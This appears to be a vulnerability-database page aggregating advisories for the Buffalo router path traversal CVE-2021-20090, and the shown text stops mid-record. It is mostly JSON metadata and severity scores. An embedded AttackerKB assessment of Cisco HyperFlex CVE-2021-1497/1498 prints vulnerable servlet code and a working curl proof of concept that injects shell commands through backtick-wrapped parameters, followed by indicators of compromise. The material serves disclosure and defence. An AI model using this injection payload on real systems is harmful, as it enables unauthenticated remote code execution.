Buffalo Router Path Traversal (CVE-2021-20090)

2021-11-09T00:00:00

Description

The remote web server hosted on the Buffalo router is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.

{"id": "BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Router Path Traversal (CVE-2021-20090)", "description": "The remote web server hosted on the Buffalo router is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.", "published": "2021-11-09T00:00:00", "modified": "2023-05-24T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/154981", "reporter": "This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.tenable.com/security/research/tra-2021-13", "https://www.buffalo.jp/news/detail/20211004-02.html"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2023-05-26T14:31:22", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0497"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-20090"]}, {"type": "cnvd", "idList": ["CNVD-2021-56801"]}, {"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20122", "CVE-2021-38703"]}, {"type": "ics", "idList": ["AA22-279A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}]}, "score": {"value": 8.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0497"]}, {"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-20090", "epss": 0.97446, "percentile": 0.99904, "modified": "2023-05-03"}], "vulnersScore": 8.3}, "_state": {"dependencies": 1685134694, "score": 1685112318, "epss": 0}, "_internal": {"score_hash": "89254dd30145d1f89a70249fc9249f5d"}, "pluginID": "154981", "sourceData": "Binary data buffalo_CVE-2021-20090_path_traversal.nbin", "naslFamily": "CGI abuses", "cpe": ["x-cpe:/o:buffalo:buffalo", "x-cpe:/h:buffalo:buffalo"], "solution": "Apply the appropriate firmware update for the device.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-20090", "vendor_cvss2": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}

{"cnvd": [{"lastseen": "2022-11-05T11:06:58", "description": "The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are routers from Buffalo Japan.The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 suffer from a path traversal vulnerability, which stems from an input validation error when the web interface handles directory traversal sequences, and can be exploited by attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are vulnerable to path traversal", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-07-30T00:00:00", "id": "CNVD-2021-56801", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-56801", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Arcadyan Buffalo firmware contains a path traversal vulnerability that could allow unauthenticated, remote attackers to bypass authentication and access sensitive information. This vulnerability affects multiple routers across several different vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arcadyan Buffalo Firmware Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-20090", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-05-27T14:32:01", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-20090", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-05-08T00:00:00", "id": "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "href": "https://attackerkb.com/topics/GHgZ2AFepI/cve-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:38:17", "description": "Advance configuration exposing Information Leakage vulnerability in Micro Focus Access Manager product, affects all versions prior to version 5.0. The vulnerability could cause information leakage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-22506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-22506"], "modified": "2021-04-02T00:00:00", "id": "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "href": "https://attackerkb.com/topics/vqXtTK63AE/cve-2021-22506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:33:48", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "attackerkb", "title": "CVE-2021-38703", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-14T00:00:00", "id": "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "href": "https://attackerkb.com/topics/Ne1D7fqkxg/cve-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:19:06", "description": "An issue was discovered on D-Link DIR-825 R1 devices through 3.0.1 before 2020-11-20. A buffer overflow in the web interface allows attackers to achieve pre-authentication remote code execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2020-29557", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-20090"], "modified": "2021-02-13T00:00:00", "id": "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "href": "https://attackerkb.com/topics/NURCgXZ1KL/cve-2020-29557", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:38:18", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:38:19", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n_Attacker value is a little lower because I was able to test only the installer._\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n @@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1497", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-15T00:00:00", "id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:16:54", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T15:15:00", "type": "cve", "title": "CVE-2021-20090", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 